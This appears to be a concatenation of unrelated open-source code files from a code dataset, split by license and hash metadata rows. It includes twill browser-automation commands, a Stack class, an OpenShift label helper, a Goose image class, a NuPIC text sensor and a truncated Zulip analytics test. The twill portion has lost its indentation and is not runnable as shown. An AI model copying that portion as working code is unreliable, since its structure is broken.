def _parseFindFlags(flags):
KNOWN_FLAGS = {
'i': re.IGNORECASE,
'm': re.MULTILINE,
's': re.DOTALL,
}
finalFlags = 0
for char in flags:
try:
finalFlags |= KNOWN_FLAGS[char]
        except KeyError:  # unknown flag characters fail the dict lookup
raise TwillAssertionError("unknown 'find' flag %r" % char)
return finalFlags
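# For example, _parseFindFlags("im") returns re.IGNORECASE | re.MULTILINE,
# which 'find' and 'notfind' pass straight on to re.compile() below.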
def find(what, flags=''):
"""
>> find <regexp> [<flags>]
Succeed if the regular expression is on the page. Sets the local
variable __match__ to the matching text.
Flags is a string consisting of the following characters:
* i: ignorecase
* m: multiline
* s: dotall
For explanations of these, please see the Python re module
documentation.
"""
regexp = re.compile(what, _parseFindFlags(flags))
page = browser.get_html()
m = regexp.search(page)
if not m:
raise TwillAssertionError("no match to '%s'" % (what,))
if m.groups():
match_str = m.group(1)
else:
match_str = m.group(0)
_, local_dict = get_twill_glocals()
local_dict['__match__'] = match_str
def notfind(what, flags=''):
"""
>> notfind <regexp> [<flags>]
Fail if the regular expression is on the page.
"""
regexp = re.compile(what, _parseFindFlags(flags))
page = browser.get_html()
if regexp.search(page):
raise TwillAssertionError("match to '%s'" % (what,))
def back():
"""
>> back
Return to the previous page.
"""
browser.back()
return browser.get_url()
def show():
"""
>> show
Show the HTML for the current page.
"""
html = browser.get_html()
print>>OUT, html
return html
def echo(*strs):
"""
>> echo <list> <of> <strings>
Echo the arguments to the screen.
"""
strs = map(str, strs)
s = " ".join(strs)
print>>OUT, s
def save_html(filename=None):
"""
>> save_html [<filename>]
Save the HTML for the current page into <filename>. If no filename
given, construct the filename from the URL.
"""
html = browser.get_html()
if html is None:
print>>OUT, "No page to save."
return
if filename is None:
url = browser.get_url()
url = url.split('?')[0]
filename = url.split('/')[-1]
        if filename == "":
filename = 'index.html'
print>>OUT, "(Using filename '%s')" % (filename,)
f = open(filename, 'w')
f.write(html)
f.close()
def sleep(interval=1):
"""
>> sleep [<interval>]
Sleep for the specified amount of time.
If no interval is given, sleep for 1 second.
"""
time.sleep(float(interval))
_agent_map = dict(
ie5='Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1)',
ie55='Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.1)',
ie6='Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
moz17='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616',
opera7='Opera/7.0 (Windows NT 5.1; U) [en]',
konq32='Mozilla/5.0 (compatible; Konqueror/3.2.3; Linux 2.4.14; X11; i686)',
saf11='Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/100 (KHTML, like Gecko) Safari/100',
aol9='Mozilla/4.0 (compatible; MSIE 5.5; AOL 9.0; Windows NT 5.1)',)
def agent(what):
"""
>> agent <agent>
Set the agent string (identifying the browser brand).
Some convenient shortcuts:
ie5, ie55, ie6, moz17, opera7, konq32, saf11, aol9.
"""
what = what.strip()
agent = _agent_map.get(what, what)
browser.set_agent_string(agent)
def submit(submit_button=None):
"""
>> submit [<buttonspec>]
Submit the current form (the one last clicked on) by clicking on the
n'th submission button. If no "buttonspec" is given, submit the current
form by using the last clicked submit button.
The form to submit is the last form clicked on with a 'formvalue' command.
The button used to submit is chosen based on 'buttonspec'. If 'buttonspec'
is given, it's matched against buttons using the same rules that
'formvalue' uses. If 'buttonspec' is not given, submit uses the last
submit button clicked on by 'formvalue'. If none can be found,
submit submits the form with no submit button clicked.
"""
browser.submit(submit_button)
def showforms():
"""
>> showforms
Show all of the forms on the current page.
"""
browser.showforms()
return browser._browser.forms()
def showlinks():
"""
>> showlinks
Show all of the links on the current page.
"""
browser.showlinks()
return browser._browser.links()
def showhistory():
"""
>> showhistory
Show the browser history (what URLs were visited).
"""
browser.showhistory()
return browser._browser._history
def formclear(formname):
"""
>> formclear <formname>
Run 'clear' on all of the controls in this form.
"""
form = browser.get_form(formname)
for control in form.controls:
if control.readonly:
continue
control.clear()
def formvalue(formname, fieldname, value):
"""
>> formvalue <formname> <field> <value>
Set value of a form field.
There are some ambiguities in the way formvalue deals with lists:
'formvalue' will *add* the given value to a list of multiple selection,
for lists that allow it.
Forms are matched against 'formname' as follows:
1. regexp match to actual form name;
2. if 'formname' is an integer, it's tried as an index.
Form controls are matched against 'fieldname' as follows:
1. unique exact match to control name;
2. unique regexp match to control name;
3. if fieldname is an integer, it's tried as an index;
4. unique & exact match to submit-button values.
Formvalue ignores read-only fields completely; if they're readonly,
nothing is done, unless the config options ('config' command) are
changed.
'formvalue' is available as 'fv' as well.
"""
form = browser.get_form(formname)
if not form:
raise TwillAssertionError("no matching forms!")
control = browser.get_form_field(form, fieldname)
browser.clicked(form, control)
if control.readonly and _options['readonly_controls_writeable']:
print>>OUT, 'forcing read-only form field to writeable'
control.readonly = False
if control.readonly or isinstance(control, ClientForm.IgnoreControl):
print>>OUT, 'form field is read-only or ignorable; nothing done.'
return
if isinstance(control, ClientForm.FileControl):
raise TwillException('form field is for file upload; use "formfile" instead')
set_form_control_value(control, value)
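# Illustrative twill-script usage of formvalue/fv (form and field names here
# are hypothetical):
#
#   go http://www.example.com/login
#   fv login username myname
#   fv login password mypassword
#   submit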
fv = formvalue
def formaction(formname, action):
"""
>> formaction <formname> <action_url>
Sets action parameter on form to action_url
"""
form = browser.get_form(formname)
form.action = action
fa = formaction
def formfile(formname, fieldname, filename, content_type=None):
"""
>> formfile <form> <field> <filename> [ <content_type> ]
Upload a file via an "upload file" form field.
"""
import os.path
filename = filename.replace('/', os.path.sep)
form = browser.get_form(formname)
control = browser.get_form_field(form, fieldname)
if not control.is_of_kind('file'):
raise TwillException('ERROR: field is not a file upload field!')
browser.clicked(form, control)
fp = open(filename, 'rb')
control.add_file(fp, content_type, filename)
print>>OUT, '\nAdded file "%s" to file upload field "%s"\n' % (filename,
control.name,)
def extend_with(module_name):
"""
>> extend_with <module>
Import contents of given module.
"""
global_dict, local_dict = get_twill_glocals()
exec "from %s import *" % (module_name,) in global_dict
### now add the commands into the commands available for the shell,
### and print out some nice stuff about what the extension module does.
import sys
mod = sys.modules.get(module_name)
###
import twill.shell, twill.parse
fnlist = getattr(mod, '__all__', None)
if fnlist is None:
fnlist = [ fn for fn in dir(mod) if callable(getattr(mod, fn)) ]
for command in fnlist:
fn = getattr(mod, command)
twill.shell.add_command(command, fn.__doc__)
twill.parse.command_list.append(command)
###
print>>OUT, "Imported extension module '%s'." % (module_name,)
print>>OUT, "(at %s)\n" % (mod.__file__,)
if twill.shell.interactive:
if mod.__doc__:
print>>OUT, "Description:\n\n%s\n" % (mod.__doc__.strip(),)
else:
if fnlist:
print>>OUT, 'New commands:\n'
for name in fnlist:
print>>OUT, '\t', name
print>>OUT, ''
def getinput(prompt):
"""
>> getinput <prompt>
Get input, store it in '__input__'.
"""
_, local_dict = get_twill_glocals()
inp = raw_input(prompt)
local_dict['__input__'] = inp
return inp
def getpassword(prompt):
"""
>> getpassword <prompt>
Get a password ("invisible input"), store it in '__password__'.
"""
_, local_dict = get_twill_glocals()
inp = getpass.getpass(prompt)
local_dict['__password__'] = inp
return inp
def save_cookies(filename):
"""
>> save_cookies <filename>
Save all of the current cookies to the given file.
"""
browser.save_cookies(filename)
def load_cookies(filename):
"""
>> load_cookies <filename>
Clear the cookie jar and load cookies from the given file.
"""
browser.load_cookies(filename)
def clear_cookies():
"""
>> clear_cookies
Clear the cookie jar.
"""
browser.clear_cookies()
def show_cookies():
"""
>> show_cookies
Show all of the cookies in the cookie jar.
"""
browser.show_cookies()
def add_auth(realm, uri, user, passwd):
"""
>> add_auth <realm> <uri> <user> <passwd>
Add HTTP Basic Authentication information for the given realm/uri.
"""
# swap around the type of HTTPPasswordMgr and
# HTTPPasswordMgrWithDefaultRealm depending on if with_default_realm
# is on or not.
if _options['with_default_realm']:
realm = None
if browser.creds.__class__ == mechanize.HTTPPasswordMgr:
passwds = browser.creds.passwd
browser.creds = mechanize.HTTPPasswordMgrWithDefaultRealm()
browser.creds.passwd = passwds
print>>OUT, 'Changed to using HTTPPasswordMgrWithDefaultRealm'
else:
if browser.creds.__class__ == mechanize.HTTPPasswordMgrWithDefaultRealm:
passwds = browser.creds.passwd
browser.creds = mechanize.HTTPPasswordMgr()
browser.creds.passwd = passwds
print>>OUT, 'Changed to using HTTPPasswordMgr'
browser.creds.add_password(realm, uri, user, passwd)
print>>OUT, "Added auth info: realm '%s' / URI '%s' / user '%s'" % (realm,
uri,
user,)
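# Illustrative twill-script usage (realm, URI and credentials are
# hypothetical):
#
#   add_auth wiki http://www.example.com/wiki/ myname mypassword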
def debug(what, level):
"""
>> debug <what> <level>
<what> can be:
* http (any level >= 1), to display the HTTP transactions.
* commands (any level >= 1), to display the commands being executed.
* equiv-refresh (any level >= 1) to display HTTP-EQUIV refresh handling.
"""
import parse
try:
level = int(level)
except ValueError:
flag = utils.make_boolean(level)
if flag:
level = 1
else:
level = 0
print>>OUT, 'DEBUG: setting %s debugging to level %d' % (what, level)
if what == "http":
browser._browser.set_debug_http(level)
elif what == 'equiv-refresh':
if level:
utils._debug_print_refresh = True
else:
utils._debug_print_refresh = False
elif what == 'commands':
if level:
parse.debug_print_commands(True)
else:
parse.debug_print_commands(False)
else:
raise TwillException('unknown debugging type: "%s"' % (what,))
def run(cmd):
"""
>> run <command>
<command> can be any valid python command; 'exec' is used to run it.
"""
# @CTB: use pyparsing to grok the command? make sure that quoting works...
# execute command.
global_dict, local_dict = get_twill_glocals()
import commands
# set __url__
local_dict['__cmd__'] = cmd
local_dict['__url__'] = commands.browser.get_url()
exec(cmd, global_dict, local_dict)
def runfile(*files):
"""
>> runfile <file1> [ <file2> ... ]
"""
import parse
global_dict, local_dict = get_twill_glocals()
for f in files:
parse.execute_file(f, no_reset=True)
def setglobal(name, value):
"""
setglobal <name> <value>
Sets the variable <name> to the value <value> in the global namespace.
"""
global_dict, local_dict = get_twill_glocals()
global_dict[name] = value
def setlocal(name, value):
"""
setlocal <name> <value>
Sets the variable <name> to the value <value> in the local namespace.
"""
global_dict, local_dict = get_twill_glocals()
local_dict[name] = value
def title(what):
"""
>> title <regexp>
Succeed if the regular expression is in the page title.
"""
regexp = re.compile(what)
title = browser.get_title()
print>>OUT, "title is '%s'." % (title,)
m = regexp.search(title)
if not m:
raise TwillAssertionError("title does not contain '%s'" % (what,))
if m.groups():
match_str = m.group(1)
else:
match_str = m.group(0)
global_dict, local_dict = get_twill_glocals()
local_dict['__match__'] = match_str
return match_str
def redirect_output(filename):
"""
>> redirect_output <filename>
Append all twill output to the given file.
"""
import twill
fp = open(filename, 'a')
twill.set_output(fp)
def reset_output():
"""
>> reset_output
Reset twill output to go to the screen.
"""
import twill
twill.set_output(None)
def redirect_error(filename):
"""
>> redirect_error <filename>
Append all twill error output to the given file.
"""
import twill
fp = open(filename, 'a')
twill.set_errout(fp)
def reset_error():
"""
>> reset_error
Reset twill error output to go to the screen.
"""
import twill
twill.set_errout(None)
def add_extra_header(header_key, header_value):
"""
>> add_header <name> <value>
Add an HTTP header to each HTTP request. See 'show_extra_headers' and
'clear_extra_headers'.
"""
browser._browser.addheaders += [(header_key, header_value)]
def show_extra_headers():
"""
>> show_extra_headers
Show any extra headers being added to each HTTP request.
"""
l = browser._browser.addheaders
if l:
print 'The following HTTP headers are added to each request:'
for k, v in l:
print ' "%s" = "%s"' % (k, v,)
print ''
else:
print '** no extra HTTP headers **'
def clear_extra_headers():
"""
>> clear_extra_headers
Remove all user-defined HTTP headers. See 'add_extra_header' and
'show_extra_headers'.
"""
browser._browser.addheaders = []
### options
_orig_options = dict(readonly_controls_writeable=False,
use_tidy=True,
require_tidy=False,
use_BeautifulSoup=True,
require_BeautifulSoup=False,
allow_parse_errors=True,
with_default_realm=False,
acknowledge_equiv_refresh=True
)
_options = {}
_options.update(_orig_options) # make a copy
def config(key=None, value=None):
"""
>> config [<key> [<int value>]]
Configure/report various options. If no <value> is given, report
the current key value; if no <key> given, report current settings.
So far:
* 'acknowledge_equiv_refresh', default 1 -- follow HTTP-EQUIV=REFRESH
* 'readonly_controls_writeable', default 0 -- make ro controls writeable
* 'require_tidy', default 0 -- *require* that tidy be installed
* 'use_BeautifulSoup', default 1 -- use the BeautifulSoup parser
* 'use_tidy', default 1 -- use tidy, if it's installed
* 'with_default_realm', default 0 -- use a default realm for HTTP AUTH
Deprecated:
* 'allow_parse_errors' has been removed.
"""
import utils
if key is None:
keys = _options.keys()
keys.sort()
print>>OUT, 'current configuration:'
for k in keys:
print>>OUT, '\t%s : %s' % (k, _options[k])
print>>OUT, ''
else:
v = _options.get(key)
if v is None:
print>>OUT, '*** no such configuration key', key
print>>OUT, 'valid keys are:', ";".join(_options.keys())
raise TwillException('no such configuration key: %s' % (key,))
elif value is None:
print>>OUT, ''
print>>OUT, 'key %s: value %s' % (key, v)
print>>OUT, ''
else:
value = utils.make_boolean(value)
_options[key] = value
def info():
"""
>> info
Report information on current page.
"""
current_url = browser.get_url()
if current_url is None:
print "We're not on a page!"
return
content_type = browser._browser._response.info().getheaders("content-type")
check_html = is_html(content_type, current_url)
code = browser.get_code()
print >>OUT, '\nPage information:'
print >>OUT, '\tURL:', current_url
print >>OUT, '\tHTTP code:', code
print >>OUT, '\tContent type:', content_type[0],
if check_html:
print >>OUT, '(HTML)'
else:
        print >>OUT, ''
if check_html:
title = browser.get_title()
print >>OUT, '\tPage title:', title
forms = browser.get_all_forms()
if len(forms):
print >>OUT, '\tThis page contains %d form(s)' % (len(forms),)
print >>OUT, ''
| gpl-2.0 | -8,889,449,112,937,615,000 | 24.756999 | 107 | 0.57741 | false |
sjschmidt44/python_data_structures | data_structures/stack.py | 1 | 1071 | from node import Node
class Stack():
def __init__(self):
self.top = None
self.size = 0
def __repr__(self):
return 'The stack has {num} Nodes, and {top} is at the top'.format(
num=self.size, top=self.top)
def push(self, val):
'''Add a value to the head of the stack.
args:
val: The value to add to the stack'''
if self.top is None:
self.top = Node(val)
else:
temp = self.top
self.top = Node(val)
temp.next = self.top
self.top.prev = temp
self.size += 1
    def pop(self):
        '''Remove the value at the head of the stack and return it.'''
        # Popping an empty stack never raised IndexError here; self.top is
        # None in that case, so guard explicitly instead of using try/except.
        if self.top is None:
            return 'The stack is empty.'
        temp = self.top
        self.top = temp.prev
        temp.prev = None
        if self.top is not None:
            self.top.next = None
        self.size -= 1
        return temp.val
def peek(self):
'''Returns a value from the head of the stack.'''
return self.top.val
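
# Illustrative usage sketch (not part of the original module). It assumes the
# companion Node class exposes `val`, `prev` and `next` attributes, as the
# methods above rely on.
if __name__ == '__main__':
    stack = Stack()
    for value in (1, 2, 3):
        stack.push(value)
    print(stack.peek())  # -> 3
    print(stack.pop())   # -> 3
    print(stack.pop())   # -> 2
    print(stack)         # repr shows the remaining size and the top node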
| mit | -8,825,053,508,267,262,000 | 25.121951 | 75 | 0.493931 | false |
rhdedgar/openshift-tools | openshift/installer/vendored/openshift-ansible-3.5.127/roles/lib_openshift/src/class/oc_label.py | 20 | 9497 | # pylint: skip-file
# flake8: noqa
# pylint: disable=too-many-instance-attributes
class OCLabel(OpenShiftCLI):
''' Class to wrap the oc command line tools '''
# pylint allows 5
# pylint: disable=too-many-arguments
def __init__(self,
name,
namespace,
kind,
kubeconfig,
labels=None,
selector=None,
verbose=False):
''' Constructor for OCLabel '''
super(OCLabel, self).__init__(namespace, kubeconfig=kubeconfig, verbose=verbose)
self.name = name
self.kind = kind
self.labels = labels
self._curr_labels = None
self.selector = selector
@property
def current_labels(self):
'''property for the current labels'''
if self._curr_labels is None:
results = self.get()
self._curr_labels = results['labels']
return self._curr_labels
@current_labels.setter
def current_labels(self, data):
'''property setter for current labels'''
self._curr_labels = data
def compare_labels(self, host_labels):
''' compare incoming labels against current labels'''
for label in self.labels:
if label['key'] not in host_labels or \
label['value'] != host_labels[label['key']]:
return False
return True
def all_user_labels_exist(self):
''' return whether all the labels already exist '''
for current_host_labels in self.current_labels:
rbool = self.compare_labels(current_host_labels)
if not rbool:
return False
return True
def any_label_exists(self):
''' return whether any single label already exists '''
for current_host_labels in self.current_labels:
for label in self.labels:
if label['key'] in current_host_labels:
return True
return False
def get_user_keys(self):
''' go through list of user key:values and return all keys '''
user_keys = []
for label in self.labels:
user_keys.append(label['key'])
return user_keys
def get_current_label_keys(self):
''' collect all the current label keys '''
current_label_keys = []
for current_host_labels in self.current_labels:
for key in current_host_labels.keys():
current_label_keys.append(key)
return list(set(current_label_keys))
def get_extra_current_labels(self):
''' return list of labels that are currently stored, but aren't
in user-provided list '''
extra_labels = []
user_label_keys = self.get_user_keys()
current_label_keys = self.get_current_label_keys()
for current_key in current_label_keys:
if current_key not in user_label_keys:
extra_labels.append(current_key)
return extra_labels
def extra_current_labels(self):
''' return whether there are labels currently stored that user
hasn't directly provided '''
extra_labels = self.get_extra_current_labels()
if len(extra_labels) > 0:
return True
return False
def replace(self):
''' replace currently stored labels with user provided labels '''
cmd = self.cmd_template()
# First delete any extra labels
extra_labels = self.get_extra_current_labels()
if len(extra_labels) > 0:
for label in extra_labels:
cmd.append("{}-".format(label))
# Now add/modify the user-provided label list
if len(self.labels) > 0:
for label in self.labels:
cmd.append("{}={}".format(label['key'], label['value']))
# --overwrite for the case where we are updating existing labels
cmd.append("--overwrite")
return self.openshift_cmd(cmd)
def get(self):
'''return label information '''
result_dict = {}
label_list = []
if self.name:
result = self._get(resource=self.kind, rname=self.name, selector=self.selector)
if 'labels' in result['results'][0]['metadata']:
label_list.append(result['results'][0]['metadata']['labels'])
else:
label_list.append({})
else:
result = self._get(resource=self.kind, selector=self.selector)
for item in result['results'][0]['items']:
if 'labels' in item['metadata']:
label_list.append(item['metadata']['labels'])
else:
label_list.append({})
self.current_labels = label_list
result_dict['labels'] = self.current_labels
result_dict['item_count'] = len(self.current_labels)
result['results'] = result_dict
return result
def cmd_template(self):
        ''' boilerplate oc command for modifying labels on this object '''
# let's build the cmd with what we have passed in
cmd = ["label", self.kind]
if self.selector:
cmd.extend(["--selector", self.selector])
elif self.name:
cmd.extend([self.name])
return cmd
def add(self):
''' add labels '''
cmd = self.cmd_template()
for label in self.labels:
cmd.append("{}={}".format(label['key'], label['value']))
cmd.append("--overwrite")
return self.openshift_cmd(cmd)
def delete(self):
'''delete the labels'''
cmd = self.cmd_template()
for label in self.labels:
cmd.append("{}-".format(label['key']))
return self.openshift_cmd(cmd)
# pylint: disable=too-many-branches,too-many-return-statements
@staticmethod
def run_ansible(params, check_mode=False):
''' run the idempotent ansible code
        params comes from the ansible portion of this module
check_mode: does the module support check mode. (module.check_mode)
'''
oc_label = OCLabel(params['name'],
params['namespace'],
params['kind'],
params['kubeconfig'],
params['labels'],
params['selector'],
verbose=params['debug'])
state = params['state']
name = params['name']
selector = params['selector']
api_rval = oc_label.get()
#####
# Get
#####
if state == 'list':
return {'changed': False, 'results': api_rval['results'], 'state': "list"}
#######
# Add
#######
if state == 'add':
if not (name or selector):
return {'failed': True,
'msg': "Param 'name' or 'selector' is required if state == 'add'"}
if not oc_label.all_user_labels_exist():
if check_mode:
return {'changed': False, 'msg': 'Would have performed an addition.'}
api_rval = oc_label.add()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': "add"}
return {'changed': False, 'state': "add"}
########
# Delete
########
if state == 'absent':
if not (name or selector):
return {'failed': True,
'msg': "Param 'name' or 'selector' is required if state == 'absent'"}
if oc_label.any_label_exists():
if check_mode:
return {'changed': False, 'msg': 'Would have performed a delete.'}
api_rval = oc_label.delete()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': "absent"}
return {'changed': False, 'state': "absent"}
if state == 'present':
########
# Update
########
if not (name or selector):
return {'failed': True,
'msg': "Param 'name' or 'selector' is required if state == 'present'"}
# if all the labels passed in don't already exist
# or if there are currently stored labels that haven't
# been passed in
if not oc_label.all_user_labels_exist() or \
oc_label.extra_current_labels():
if check_mode:
return {'changed': False, 'msg': 'Would have made changes.'}
api_rval = oc_label.replace()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = oc_label.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': "present"}
return {'changed': False, 'results': api_rval, 'state': "present"}
return {'failed': True,
'changed': False,
'results': 'Unknown state passed. %s' % state,
'state': "unknown"}
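
# Illustrative sketch only: the generated Ansible module builds a params dict
# from the task arguments and hands it to OCLabel.run_ansible(). The values
# below are hypothetical.
#
#   params = {
#       'kubeconfig': '/etc/origin/master/admin.kubeconfig',
#       'state': 'present',
#       'debug': False,
#       'kind': 'node',
#       'name': 'node1.example.com',
#       'namespace': 'default',
#       'labels': [{'key': 'region', 'value': 'infra'}],
#       'selector': None,
#   }
#   results = OCLabel.run_ansible(params, check_mode=False)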
| apache-2.0 | 7,749,958,976,490,707,000 | 31.523973 | 94 | 0.520901 | false |
muggot/python-goose | goose/images/ImageExtractor.py | 1 | 1258 | # -*- coding: utf-8 -*-
"""\
This is a python port of "Goose" originally licensed to Gravity.com
under one or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership.
Python port was written by Xavier Grangier for Recrutae
Gravity.com licenses this file
to you under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class LocallyStoredImage(object):
def __init__(self, imgSrc='', localFileName='',
linkhash='', bytes=long(0), fileExtension='', height=0, width=0):
self.imgSrc = imgSrc
self.localFileName = localFileName
self.linkhash = linkhash
self.bytes = bytes
self.fileExtension = fileExtension
self.height = height
self.width = width
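
# Minimal usage sketch (illustrative only; all values are hypothetical).
# A LocallyStoredImage simply records metadata about an image that has
# already been fetched to local disk.
if __name__ == '__main__':
    img = LocallyStoredImage(imgSrc='http://example.com/cat.jpg',
                             localFileName='/tmp/goose/cat.jpg',
                             linkhash='abc123',
                             bytes=long(34567),
                             fileExtension='.jpg',
                             height=480,
                             width=640)
    print img.localFileName, img.width, img.height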
| apache-2.0 | 7,027,247,018,022,876,000 | 34.942857 | 73 | 0.734499 | false |
BoltzmannBrain/nupic.research | htmresearch/regions/LanguageSensor.py | 2 | 8108 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import copy
import numpy
from collections import deque
from nupic.bindings.regions.PyRegion import PyRegion
class LanguageSensor(PyRegion):
"""
LanguageSensor (LS) is an extensible sensor for text data.
The LS obtains info from a file, csv or txt (not yet implemented).
An LS is essentially a shell containing two objects:
1. A DataSource object gets one record at a time. This record is returned
as a dict object by getNextRecordDict(). For example, a DataSource might
return:
{sample="Hello world!", labels=["Python"]}
2. An encoder from nupic.fluent/encoders
The DataSource and LanguageEncoder are supplied after the node is created,
not in the node itself.
"""
def __init__(self,
verbosity=0,
numCategories=1):
"""Create a node without an encoder or datasource."""
self.numCategories = numCategories
self.verbosity = verbosity
# These fields are set outside when building the region.
self.encoder = None
self.dataSource = None
self._outputValues = {}
self._iterNum = 0
self.queue = deque()
@classmethod
def getSpec(cls):
"""Return base spec for this region. See base class method for more info."""
spec = {
"description":"Sensor that reads text data records and encodes them for "
"an HTM network.",
"singleNodeOnly":True,
"outputs":{
"dataOut":{
"description":"Encoded text",
"dataType":"Real32",
"count":0,
"regionLevel":True,
"isDefaultOutput":True,
},
"categoryOut":{
"description":"Index of the current word's category.",
"dataType":"Real32",
"count":0,
"regionLevel":True,
"isDefaultOutput":False,
},
"resetOut":{
"description":"Boolean reset output.",
"dataType":"Real32",
"count":1,
"regionLevel":True,
"isDefaultOutput":False,
},
"sequenceIdOut":{
"description":"Sequence ID",
"dataType":'Real32',
"count":1,
"regionLevel":True,
"isDefaultOutput":False,
},
},
"inputs":{},
"parameters":{
"verbosity":{
"description":"Verbosity level",
"dataType":"UInt32",
"accessMode":"ReadWrite",
"count":1,
"constraints":"",
},
"numCategories":{
"description":("Total number of categories to expect from the "
"FileRecordStream"),
"dataType":"UInt32",
"accessMode":"ReadWrite",
"count":1,
"constraints":""},
},
"commands":{},
}
return spec
def initialize(self, inputs, outputs):
"""Initialize the node after the network is fully linked."""
if self.encoder is None:
raise Exception("Unable to initialize LanguageSensor -- "
"encoder has not been set")
def rewind(self):
"""Reset the sensor to the beginning of the data file."""
self._iterNum = 0
if self.dataSource is not None:
self.dataSource.rewind()
def populateCategoriesOut(self, categories, output):
"""
Populate the output array with the category indices.
Note: non-categories are represented with -1.
"""
if categories[0] is None:
# The record has no entry in category field.
output[:] = -1
else:
# Populate category output array by looping over the smaller of the
# output array (size specified by numCategories) and the record's number
# of categories.
[numpy.put(output, [i], cat)
for i, (_, cat) in enumerate(zip(output, categories))]
output[len(categories):] = -1
def compute(self, inputs, outputs):
"""
Get a record from the dataSource and encode it. The fields for inputs and
outputs are as defined in the spec above.
Expects the text data to be in under header "token" from the dataSource.
"""
if len(self.queue) > 0:
# Data has been added to the queue, so use it
data = self.queue.pop()
elif self.dataSource is None:
raise Exception("LanguageSensor: No data to encode: queue is empty "
"and the dataSource is None.")
else:
data = self.dataSource.getNextRecordDict()
# Keys in data that are not column headers from the data source are
# standard of RecordStreamIface objects
# Copy important data input fields over to outputs dict.
outputs["resetOut"][0] = data["_reset"]
outputs["sequenceIdOut"][0] = data["_sequenceId"]
self.populateCategoriesOut(data["_category"], outputs["categoryOut"])
self.encoder.encodeIntoArray(data["_token"], outputs["dataOut"])
if self.verbosity > 0:
print "LanguageSensor outputs:"
print "SeqID: ", outputs["sequenceIdOut"]
print "Categories out: ", outputs['categoryOut']
print "dataOut: ", outputs["dataOut"].nonzero()[0]
# Deep copy the outputs so self._outputValues doesn't point to the values
# used within the Network API
self._outputValues = {
field: copy.deepcopy(value) for field, value in outputs.iteritems()
}
self._outputValues["sourceOut"] = data["_token"]
self._iterNum += 1
def addDataToQueue(self, token, categoryList, sequenceId, reset=0):
"""
Add the given data item to the sensor's internal queue. Calls to compute
will cause items in the queue to be dequeued in FIFO order.
@param token (str) The text token
@param categoryList (list) A list of one or more integer labels associated
with this token. If the list is [None], no
categories will be associated with this item.
@param sequenceId (int) An integer ID associated with this token and its
sequence (document).
@param reset (int) Should be 0 or 1. resetOut will be set to this
value when this item is computed.
"""
self.queue.appendleft ({
"_token": token,
"_category": categoryList,
"_sequenceId": sequenceId,
"_reset": reset
})
def getOutputValues(self, outputName):
"""Return the region's values for outputName.
"""
return self._outputValues[outputName]
def getOutputElementCount(self, name):
"""Returns the width of dataOut."""
if name == "resetOut" or name == "sequenceIdOut":
print ("WARNING: getOutputElementCount should not have been called with "
"{}.".format(name))
return 1
elif name == "dataOut":
if self.encoder == None:
raise Exception("Network requested output element count for {} on a "
"LanguageSensor node, but the encoder has not been set."
.format(name))
return self.encoder.getWidth()
elif name == "categoryOut":
return self.numCategories
else:
raise Exception("Unknown output {}.".format(name))
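
# Minimal usage sketch (illustrative; assumes the nupic dependencies above are
# installed). Outside of a Network, the sensor can still queue data that a
# later compute() call would consume once an encoder has been attached.
if __name__ == "__main__":
  sensor = LanguageSensor(verbosity=0, numCategories=1)
  sensor.addDataToQueue(token="hello", categoryList=[0], sequenceId=0, reset=1)
  sensor.addDataToQueue(token="world", categoryList=[0], sequenceId=0)
  print "Queued items:", len(sensor.queue)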
| agpl-3.0 | -783,225,662,559,630,500 | 31.562249 | 80 | 0.609521 | false |
blaze225/zulip | analytics/tests/test_counts.py | 2 | 31188 | from __future__ import absolute_import
from django.db import models
from django.db.models import Sum
from django.test import TestCase
from django.utils import timezone
from analytics.lib.counts import CountStat, COUNT_STATS, process_count_stat, \
zerver_count_user_by_realm, zerver_count_message_by_user, \
zerver_count_message_by_stream, zerver_count_stream_by_realm, \
do_fill_count_stat_at_hour, do_increment_logging_stat, ZerverCountQuery, \
LoggingCountStat, do_aggregate_to_summary_table
from analytics.models import BaseCount, InstallationCount, RealmCount, \
UserCount, StreamCount, FillState, installation_epoch
from zerver.lib.actions import do_create_user, do_deactivate_user, \
do_activate_user, do_reactivate_user
from zerver.models import Realm, UserProfile, Message, Stream, Recipient, \
Huddle, Client, get_user_profile_by_email, get_client
from datetime import datetime, timedelta
from six.moves import range
from typing import Any, Dict, List, Optional, Text, Tuple, Type, Union
class AnalyticsTestCase(TestCase):
MINUTE = timedelta(seconds = 60)
HOUR = MINUTE * 60
DAY = HOUR * 24
TIME_ZERO = datetime(1988, 3, 14).replace(tzinfo=timezone.utc)
TIME_LAST_HOUR = TIME_ZERO - HOUR
def setUp(self):
# type: () -> None
self.default_realm = Realm.objects.create(
string_id='realmtest', name='Realm Test',
domain='test.analytics', date_created=self.TIME_ZERO - 2*self.DAY)
# used to generate unique names in self.create_*
self.name_counter = 100
# used as defaults in self.assertCountEquals
self.current_property = None # type: Optional[str]
# Lightweight creation of users, streams, and messages
